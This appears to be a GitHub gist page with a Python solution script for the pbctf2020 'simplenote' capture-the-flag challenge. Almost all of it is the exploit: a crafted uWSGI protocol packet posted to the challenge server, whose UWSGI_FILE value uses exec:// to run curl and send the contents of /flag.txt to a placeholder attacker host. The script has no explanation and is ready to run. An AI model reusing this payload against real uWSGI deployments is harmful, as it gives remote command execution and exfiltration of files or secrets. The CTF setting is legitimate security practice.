Skip to content

Instantly share code, notes, and snippets.

@shpik-kr

shpik-kr/pbctf2020_simplenote.py

Created December 7, 2020 00:59
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save shpik-kr/3f4ce5ccaee64099f81b581563c249c8 to your computer and use it in GitHub Desktop.
Save shpik-kr/3f4ce5ccaee64099f81b581563c249c8 to your computer and use it in GitHub Desktop.
Download ZIP
pbctf2020 simplenote
Raw
pbctf2020_simplenote.py
import requests
url = "http://simplenote.chal.perfect.blue/"
data = '\x00\xdc\x00\x00\x0f\x00SERVER_PROTOCOL\x08\x00HTTP/1.1\x0e\x00REQUEST_METHOD\x03\x00GET\t\x00PATH_INFO\x01\x00/\x0b\x00REQUEST_URI\x01\x00/\x0c\x00QUERY_STRING\x00\x00\x0b\x00SERVER_NAME\x00\x00\t\x00HTTP_HOST\x08\x00app:4444\n\x00UWSGI_FILE<\x00exec://curl http://[YOUR_URL]:10101 --data "`cat /flag.txt`"\x0b\x00SCRIPT_NAME\x01\x00a'
r = requests.post(url, data = data)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment